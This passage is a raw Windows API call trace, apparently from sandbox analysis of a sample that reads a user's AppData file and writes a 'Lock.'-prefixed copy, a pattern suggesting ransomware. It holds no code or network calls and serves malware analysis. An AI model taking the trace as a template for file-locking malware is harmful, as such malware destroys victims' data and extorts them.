(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0237.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0237.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0237.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0237.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0237.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0237.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0237.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0237.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0237.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0237.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0237.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0237.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0237.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0237.685] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0237.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0237.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0237.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.686] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0237.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0237.687] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0237.687] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0237.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69ba8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0237.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0237.687] CryptDestroyHash (hHash=0xa87250) returned 1 [0237.687] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.687] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.687] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0237.687] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0237.687] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.688] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/qFOBP8FwJiuKVs.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\qfobp8fwjiukvs.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0237.688] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.688] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0237.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0237.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0237.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0237.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0237.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0237.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0237.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0237.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0237.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0237.689] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0237.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0237.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0237.689] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0237.689] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0237.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0237.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0237.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0237.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0237.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0237.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0237.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0237.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0237.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0237.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0237.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0237.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0237.690] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0237.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0237.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0237.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0237.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0237.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0237.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0237.691] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.qFOBP8FwJiuKVs.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.qfobp8fwjiukvs.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0237.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0237.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0237.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0237.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0237.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0237.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0237.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0237.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0237.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0237.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0237.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0237.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0237.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0237.692] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0237.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0237.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0237.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0237.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0237.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0237.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0237.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0237.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0237.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0237.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0237.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0237.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0237.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0237.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0237.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe54020 [0237.736] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0237.736] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0xd667, lpOverlapped=0x0) returned 1 [0237.743] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0237.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0237.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0237.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0237.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd667) returned 0x2f14818 [0237.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe54020 | out: hHeap=0x970000) returned 1 [0237.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0237.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0237.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0237.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0237.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0237.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0237.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0237.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0237.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd667) returned 0x2f21e88 [0237.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0237.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0237.753] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0237.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0237.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0237.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0237.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0237.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd667) returned 0x2f14818 [0237.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0237.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0237.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0237.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0237.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0237.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0237.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0237.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0237.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0237.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0237.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0237.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0237.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 